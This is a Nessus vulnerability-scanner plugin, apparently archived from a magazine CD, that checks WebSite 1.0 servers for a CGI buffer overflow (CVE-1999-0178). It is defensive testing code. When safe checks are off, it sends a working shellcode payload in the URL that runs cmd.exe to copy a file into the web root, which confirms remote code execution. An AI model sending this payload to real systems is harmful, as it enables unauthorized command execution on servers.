home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / WebSite.nasl < prev    next >
Encoding:
Text File  |  2005-01-14  |  2.7 KB  |  103 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10008);
  11.  script_bugtraq_id(2078);
  12.  script_version ("$Revision: 1.22 $");
  13.  script_cve_id("CVE-1999-0178");
  14. # Name :
  15.  script_name(english:"WebSite 1.0 buffer overflow",
  16.           francais:"WebSite 1.0 : dΘpassement de buffer");
  17.  
  18. # Description :
  19.   script_description(
  20.           english:string("There is a buffer overflow in some 
  21.         WebSite 1.0 CGI scripts which allow a remote intruder 
  22.         to execute any command on the remote host.
  23.  
  24.         Platform affected : WindowsNT
  25.         
  26.         Solution : Upgrade to the latest version, or contact 
  27.         your vendor for a patch.
  28.         
  29.         Risk factor : High"),
  30.  
  31.         francais:string("Dans certains cgi WebSite 1.0, un dΘpassement de buffer permet α un intrus d'executer n'importe quelle commande sur le serveur cible.\n
  32. SystΦme affectΘ : WindowsNT\nFacteur de risque : ElevΘ"));
  33.  
  34.  
  35.  
  36. # Copyright :
  37.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  38.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  39.  
  40. # Summary :
  41.   script_summary(english:"WebSite 1.0 CGI arbitrary code execution",
  42.            francais:"Execute du code arbitraire sur la machine distante");
  43.          
  44. # Family
  45.   script_family(english:"Remote file access",
  46.           francais:"AccΦs aux fichiers distants");
  47.         
  48.  script_category(ACT_MIXED_ATTACK); # mixed
  49.  script_dependencie("find_service.nes", "no404.nasl");
  50.  script_require_ports("Services/www", 80);
  51.  exit();
  52. }
  53.  
  54. ##########################
  55. #             #
  56. # The actual script code # 
  57. #             #
  58. ##########################
  59.  
  60. include("http_func.inc");
  61. include("http_keepalive.inc");
  62. port = get_http_port(default:80);
  63.  
  64.  
  65. if(safe_checks())
  66. {
  67.  res = is_cgi_installed_ka(item:"/cgi-shl/win-c-sample.exe", port:port);
  68.  if(res)
  69.  {
  70.   alrt = "
  71. There may be buffer overflow in the remote cgi win-c-sample.exe.
  72. An attacker may use this flaw to execute arbitrary commands
  73. on this host.
  74.  
  75. *** Nessus reports this vulnerability using only
  76. *** information that was gathered. Use caution
  77. *** when testing without safe checks enabled.
  78.  
  79. Solution : delete it
  80. Risk factor : High";
  81.  
  82.   security_hole(port:port, data:alrt);
  83.  }
  84.  exit(0);
  85. }
  86.  
  87.  
  88. command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\x1.htm";
  89.  
  90. res = is_cgi_installed_ka(item:"x1.htm", port:port);
  91. if(!res)
  92. {
  93.  is_cgi_installed_ka(item:command, port:port);
  94.  res = is_cgi_installed_ka(item:"x1.htm", port:port);
  95.  if(res)security_hole(port);
  96. }
  97.  
  98.  
  99.  
  100.  
  101.  
  102.           
  103.